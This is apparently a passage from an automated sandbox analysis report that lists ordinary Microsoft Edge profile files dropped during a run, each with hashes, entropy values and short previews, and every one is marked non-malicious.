                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):281
                                                                                                                                                                  Entropy (8bit):5.231571636654386
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:iO/04M1wkn23oH+Tcwtfrl2KLl9MX/jIq2Pwkn23oH+TcwtfrK+IFUv:7/04rfYeb1LzMkvYfYeb23FUv
                                                                                                                                                                  MD5:C62A5039E96222FEDE288E90B5D6138C
                                                                                                                                                                  SHA1:E4269A849B96C7D67E897D77D6E6C7FD1EC68956
                                                                                                                                                                  SHA-256:804AF5BBB3D56D51C73165DEC0668F971D24BA08780E37477ACD255F4E8D8D35
                                                                                                                                                                  SHA-512:0BE978604135AF0A4C5E4B067A6E73E4E4BDF8AB749B932F3691B4327A1160BEB62B245097F16F133A7C9CF578AD9EBCDF2806DECB9201A85E1CC95C6CA9BCA9
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/06-17:17:54.993 1ed4 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db since it was missing..2025/01/06-17:17:55.004 1ed4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):617
                                                                                                                                                                  Entropy (8bit):3.908330774290457
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:G0nYUteza//z3p/F+iPAz7QRjvRtin01zv0:G0nYUtezaD3RYiPp1L0
                                                                                                                                                                  MD5:3E0912AC7F87B099AAF69D3A8CA8913A
                                                                                                                                                                  SHA1:9A0AA7B5358A96404F404C388994C956C0F23295
                                                                                                                                                                  SHA-256:C2D81B2E57CCF2048836B95BB42BA9991A2C04A4C868ED432A2E4387D6D1129F
                                                                                                                                                                  SHA-512:1F01280A002C380BCFAF9DF00B6651B73766640BF514F72125FAC0B348EBA7308AE65009A065709888B34B05628D623D2A5E0B7753B3FBED71483A07056E712B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................21_.....n[.=.................33_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_......Q...................20_.......w<.................20_.......ln.................19_.....G....................37_.....[Q.|.................38_.......K..................39_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.|.................9_.....'\c..................9_.....
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):299
                                                                                                                                                                  Entropy (8bit):5.202506600080695
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:iO/+VFZn34M1wkn23oH+Tcwtfrzs52KLl9+TFZnFIq2Pwkn23oH+TcwtfrzAdIF2:7/+VFZn34rfYebs9Lz+CvYfYeb9FUv
                                                                                                                                                                  MD5:5629C70D84321BFD551E15C13B83BA95
                                                                                                                                                                  SHA1:32A48B98A5CD0B1B35418DA9ADDF58CBB31DDDBB
                                                                                                                                                                  SHA-256:E7F2762C855F99752C70865641DECD877E3C1E13CB35E74124FBEAF12A86921E
                                                                                                                                                                  SHA-512:24ABF78AC061A0E99B7B52E022814A3F9F0AB3EDBEDCE7F66FF283A513750079C8E75E82769A7E743DB587BB3B2166E95577CB62F1682415A8DCEC8E782AFA73
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/06-17:17:54.980 1ed4 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata since it was missing..2025/01/06-17:17:54.986 1ed4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.01057775872642915
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsFl:/F
                                                                                                                                                                  MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                  SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                  SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                  SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                  Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                  MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                  SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                  SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                  SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.011852361981932763
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsHlDll:/H
                                                                                                                                                                  MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                  SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                  SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                  SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.012340643231932763
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                  MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                  SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                  SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                  SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):262512
                                                                                                                                                                  Entropy (8bit):9.553120663130604E-4
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:LsNlTxl:Ls3dl
                                                                                                                                                                  MD5:36A5B3612AC5BB140D24D903B07A9F6D
                                                                                                                                                                  SHA1:C6E2F1F803B6B1F54C7D650D2F8CBC1F0162E193
                                                                                                                                                                  SHA-256:14C292EAE636DBD00E4A886ACA6EBF33F52AAE4ADC853C9E57D9144431BBC258
                                                                                                                                                                  SHA-512:FF5CB868F09F9C0C4F4E28EBF9F51FF11B8CCB2E79031FEF81C78FA341D427F24A540E1E2F8417BE1A93A3E0CCAF7E8FF6DE79A213FC7B3D5A88F82E6687C6A4
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.01057775872642915
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsFl:/F
                                                                                                                                                                  MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                  SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                  SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                  SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                  Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                  MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                  SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                  SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                  SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.011852361981932763
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsHlDll:/H
                                                                                                                                                                  MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                  SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                  SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                  SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.012340643231932763
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                  MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                  SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                  SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                  SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):262512
                                                                                                                                                                  Entropy (8bit):9.553120663130604E-4
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:LsNl9:Ls3
                                                                                                                                                                  MD5:4E11BC0BC57AC5C993AD15782A95B20B
                                                                                                                                                                  SHA1:1EC52CC88AC8ADDA202B79F5D6CA37EBA4A86E8E
                                                                                                                                                                  SHA-256:BA16816A758F44ABB6F5DF2CB10BAE2EB1C56E329E26B44DFB704625C76E606B
                                                                                                                                                                  SHA-512:DC75C96D8052AB45DE9FFC5CB6B67EAE05891AE4CA55136067FED1C7662209C028DE0CEAF606AAB666D5B7A5E6A0AFB3B0D6A4BDAF43C25999DBCFCF27F4CDAA
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):120
                                                                                                                                                                  Entropy (8bit):3.32524464792714
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                  MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                  SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                  SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                  SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):13
                                                                                                                                                                  Entropy (8bit):2.7192945256669794
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                  MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                  SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                  SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                  SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:117.0.2045.47
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                  Entropy (8bit):5.789375762796217
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:iaqkHf1BCd5ih/cI9URLl8RotoJMFVvlwhue4IbONIeTC6XQS0qGqk+Z4uj+rjEy:aktBCSeiRUChu6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                  MD5:9E21B2DB893B756C097219FA3F097686
                                                                                                                                                                  SHA1:C677359A0EDEBD41238C1452A33A689A7A34325D
                                                                                                                                                                  SHA-256:3DBDE41ABA755128F124E0A4CDD1E81FD59F96FD2518CEE36E88B3EA1F367003
                                                                                                                                                                  SHA-512:EDFB937F766C4AEEAB3083C14F606C70AB0763285C88460441C2F47DF0559A39CAF27B2E6A8411ACAB1B0DBB59CA45CD0980C61C58F48320DFBB56690C8D0C34
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABJReHtLucWTJdvQHRJ7QWEEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAAcqolwnWwZiqGThP75aM2gcilbZedgckyBnWkzUbIAzgAAAAA
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.6773696719930975
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                  MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                  SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                  SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                  SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.01057775872642915
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsFl:/F
                                                                                                                                                                  MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                  SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                  SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                  SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                  Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                  MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                  SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                  SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                  SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.011852361981932763
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsHlDll:/H
                                                                                                                                                                  MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                  SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                  SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                  SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.012340643231932763
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                  MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                  SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                  SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                  SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):262512
                                                                                                                                                                  Entropy (8bit):9.47693366977411E-4
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:LsNlsy+:Ls3sy+
                                                                                                                                                                  MD5:FE625A92DAD7AA317B11AC4E54BC15DC
                                                                                                                                                                  SHA1:A7A647D64BA1C97F33B31077DCC1CC766997BF25
                                                                                                                                                                  SHA-256:E20A4C12E43A48AABC7BA1384FA3F396CC9FA990B01241340DDD115CF6CE5795
                                                                                                                                                                  SHA-512:1B33FC435E126C3BB8B54BD93D431D5041423C513F0725F686E2BB2B61886539E287517FF3BF5C381E33D4273C8374618E07A23F733ABCF373E583A4762CF2FD
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):47
                                                                                                                                                                  Entropy (8bit):4.3818353308528755
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                  MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                  SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                  SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                  SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):35
                                                                                                                                                                  Entropy (8bit):4.014438730983427
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                  MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                  SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                  SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                  SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"forceServiceDetermination":false}
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):29
                                                                                                                                                                  Entropy (8bit):3.922828737239167
